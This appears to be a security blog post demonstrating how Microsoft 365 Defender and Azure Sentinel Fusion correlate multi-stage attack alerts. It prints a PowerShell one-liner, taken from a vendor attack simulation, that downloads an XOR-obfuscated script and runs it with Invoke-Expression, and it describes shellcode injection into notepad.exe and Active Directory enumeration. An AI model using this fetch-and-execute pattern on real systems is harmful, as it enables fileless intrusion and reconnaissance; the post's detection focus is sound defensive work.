Microsoft 365 Defender XDR and Azure Sentinel Fusion attack and detection example

Patient zero is the first device (or identity) that has been compromised, after the initial compromise, the attacker continues the attack, e.g. via (local & domain) privilege escalation and lateral movement to exfiltrate or destroy data (e.g. ransomware).

It’s very important during a breach to connect the dots for the RCA (Root Cause Analyse). With the Microsoft Security tooling, different Alerts can be correlated into Incidents, initial per source (e.g. device) and multi-sources (e.g. identity & device).

Multi-source attack

An example of a multi-source (staged) attack is the Microsoft PowerShell command below, which leverages Microsoft Defender for Endpoint (MDE) and Microsoft Defender for Identity (MDI).

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$xor
= [System.Text.Encoding]::UTF8.GetBytes(‘WinATP-Intro-Injection’);
$base64String = (Invoke-WebRequest -URI “https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
-UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };
$i = 0;
$decryptedBytes = @();
$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

We can decode the Base64 script (MTP_Fileless_Recon.txt) via running the separate commands without the Invoke-Expression:

The command:
1) inject a shellcode (communicate to a simulated C&C server on IP-address 204.79.197.203) into the %windir%\System32\notepad.exe process
2) write a log to $env:temp + ‘\reconlog.txt
3) call the Netapi32.NetSessionEnum API to enumerate the Active Directory.

Microsoft 365 Defender XDR

Microsoft 365 Defender correlates (in the attack example above) the Microsoft Defender for Endpoint (MDE) and Microsoft Defender for Identity (MDI) alert(s) into a single multi-source XDR (eXtended Detection and Response) Incident; Multi-stage incident involving Execution & Discovery on one endpoint reported by multiple sources

By clicking the Incident, details of the Incident are shown.

For example the timeline of the attack, the entities which were correlated and the IOCs (Indicators of Compromise like the C&C IP-address used) are shown in details page to triage and remediate the Incident.

Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win @JohnLaTwC

The Graph page provides a graphical overview to connect the dots of the attack.

Microsoft 365 Defender Automatic Investigation and Response (AIR) can manually (MDO and MDE semi via approve or reject) or fully automated (MDE only by the time of writing) resolve the Incident.

Azure Sentinel Fusion

Azure Sentinel Fusion (enabled by default) is an ML (Machine Learning) detection service to detect advanced multistage attacks. The following Data Connectors support Fusion detections (by the time of writing):

Azure Active Directory Identity Protection
Microsoft Cloud App Security
Microsoft Defender for Endpoint
Azure Defender
Azure Sentinel (Scheduled analytics rules)
Palo Alto Networks (raw logs)

The data connector(s) and scheduled analytic rule(s) support is continuously expanded, e.g. the Fusion Detection for Ransomware.

An example of visibility of a multistage Incident in Azure Sentinel is the initial attack in the blog (although the intelligence comes from Microsoft 365 and not Fusion, the output in Azure Sentinel is the same).

The Incident page shows one Incident with multiple (7) Alerts.

If we select the Incident and click View full details, the details page is shown with the data connector products in-scope, the timeline of the Alerts, the Entities which correlates the Alerts into the single Incident and the MITRE Att&ck tactics.

Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.

By selecting Investigate a graphical overview is presented to ‘easily’ connect the dots of the attack like stated in the first section of this blog.

I hope this blogs gives some insights in multistage attack and the power of Microsoft 365 Defender XDR and Azure Sentinel Fusion detection.

Chief Technology Officer @ Nedscaper